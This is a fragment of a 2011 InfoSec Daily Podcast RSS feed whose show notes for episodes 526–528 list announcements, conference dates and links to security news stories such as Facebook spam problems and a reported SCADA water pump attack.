	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite the fact that cyber security is being breached every day, there seems to be little urgency in devising a National Cyber Security Policy that could provide not just a security blanket against future attacks but also a framework for offensive capabilities that enables India to retaliate and launch attacks against enemy nations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/231903423/researchers-seven-annoying-attacks-that-facebook-misses.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/231903423/researchers-seven-annoying-attacks-that-facebook-misses.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook has largely erased the rash of porn and violent images that affected the site earlier this week, but its problems are far from over, researchers said yesterday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a blog about Facebook&#39;s security vulnerabilities posted Thursday, researchers at security vendor Barracuda Networks said Facebook still has little incentive to improve its site security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;When you are trying to grow a social network as well as increase advertising revenue, security becomes not only a lower priority but sometimes a conflict of interest,&quot; the blog states.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook continues to miss some key security issues on its pages, Barracuda says, and it outlined seven:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Fake Product Pages.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Manipulated Accounts Recommendations.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. Affiliate Spam.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Photo Tagging For Spam.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Fake Apps.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. Stolen Pictures.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7. Anomalous Behavior.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3179/0/infosec-daily-podcast-episode-528.mp3" length="23048295" type="audio/mpeg" />
		<itunes:duration>0:47:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338
	An airman armed with a pistol barricaded himself in a building at an Air Force base in Colorado that controls all GPS satellites, but operations haven&#39;t been disrupted, officials said Monday.
	The building was evacuated, and no shots were fired and no one was injured, said Schriever Air Force Base spokeswoman Jennifer Thibault.
	A negotiator and a SWAT team from the El Paso County Sheriff&#39;s Department were on scene at the Air Force&#39;s request, said Air Force Lt. Marie Denson.
	Thibault said the airman is a member of a security squadron and is armed with his own handgun. 
	Officials were investigating how he got the weapon past security and onto the base.
	The airman is in a building where personnel prepare for deployments, Thibault said.
	Control rooms for GPS and other military satellites are in a separate, heavily protected inner compound surrounded by fences and staffed with armed guards.
	The gunman faces a discharge over a matter in civilian court, but no other details were available, Denson said. He is still classified as being on active duty, she said.
	The airman&#39;s name, rank and service history weren&#39;t immediately released.
	The base about 60 miles south of Denver controls more than 60 military satellites.
	Source: https://community.rapid7.com/community/metasploit/blog/2011/11/21/hd-moores-law
	At Metricon6 and later on his blog Cognitive Dissidents, Joshua Corman presented his latest discovery &#8211; HD Moore&#39;s Law:
	 
	&#34;Casual Attacker power grows at the rate of Metasploit&#34;
	 
	Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure.
	 
	HD Moore created the Metasploit Project in 2003 to provide the secur[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z</title>
		<link>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 20 Nov 2011 04:28:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3175</guid>
		<description><![CDATA[Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik. Guests: hackett, aricon, &#38; spridel. Announcements: SANS Mentoring: Forensics 408 &#8211; Computer Forensic When: Starts November 30, 2011 Where: Atlanta, GA Discount Code: M1011IPAD (free iPad 2) http://www.sans.org/mentor/details.php?nid=25504 [...]]]></description>
			<content:encoded><![CDATA[<p><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial; font-size: 15px; font-weight: bold; white-space: pre-wrap; ">Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z</span></p>
<div style="background-color: transparent; "><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 527 for November 19, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. B0n3z, &amp; Boris Sverdlik.</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Guests: hackett, aricon, &amp; spridel.</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Announcements:</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">SANS Mentoring: Forensics 408 &ndash; Computer Forensic </span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: Starts November 30, 2011</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Atlanta, GA</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">ShmooCon 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: January 27th-29th, 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &ndash; &quot;The Reunion&quot;</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></p>
<p>
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories:</span></p>
<p>	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); vertical-align: baseline; white-space: pre-wrap; ">https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html</span></a></p>
<p>	<a href="http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack</span></a><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><a href="http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html</span></a></p>
<p>	<a href="http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/</span></a><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><br />
	<a href="http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency</span></a></p>
<p>	<a href="http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html</span></a><br />
	<span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	</span><a href="http://occupyflash.org/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://occupyflash.org/</span></a></p>
<p>	<a href="http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/</span></a></p>
<p>	<a href="http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration</span></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-527-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3175/0/infosec-daily-podcast-episode-527.mp3" length="55841703" type="audio/mpeg" />
		<itunes:duration>0:38:47</itunes:duration>
		<itunes:subtitle>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z
InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik.
	Guests: hackett, aricon, &#38; spridel.
	Announcements:
	SANS Ment[...]</itunes:subtitle>
		<itunes:summary>Episode 527 &#8211; Weekend Wrap-up with Dr. B0n3z
InfoSec Daily Podcast Episode 527 for November 19, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. B0n3z, &#38; Boris Sverdlik.
	Guests: hackett, aricon, &#38; spridel.
	Announcements:
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic 
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.infosecisland.com/security-videos-view/17944-Definition-of-a-Real-Security-Consultant.html
	http://www.tgdaily.com/security-features/59737-hackers-destroy-water-pump-in-scada-attack
	
	http://edition.cnn.com/2011/11/18/world/asia/afghanistan-twitter-war/index.html
	http://www.theregister.co.uk/2011/11/17/us_military_cyberspace/
	
	http://www.extremetech.com/computing/105931-full-disk-encryption-is-too-good-says-us-intelligence-agency
	http://packetstormsecurity.org/news/view/20202/Norweigian-Oil-And-Defense-Industries-Are-Hit-By-A-Major-Cyber-Attack.html
	
	http://occupyflash.org/
	http://www.forbes.com/sites/bruceupbin/2011/11/15/researchers-show-how-easy-it-is-to-infiltrate-facebook/
	http://news.cnet.com/8301-17938_105-57327665-1/world-toilet-day-lets-have-a-sanitation-celebration</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 526 &#8211; pre-IPO Bust, Who Is Michael?!?, FindFriendz.com, Water Plants Attacked, Compromised Certs &amp; SOPA</title>
		<link>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa</link>
		<comments>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa#comments</comments>
		<pubDate>Sat, 19 Nov 2011 01:55:57 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3171</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 526 for November 18, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US Securities and Exchange Commission has closed down an investment scam that was touting pre-IPO shares in Facebook, Twitter, Zynga and Groupon.</span></p>
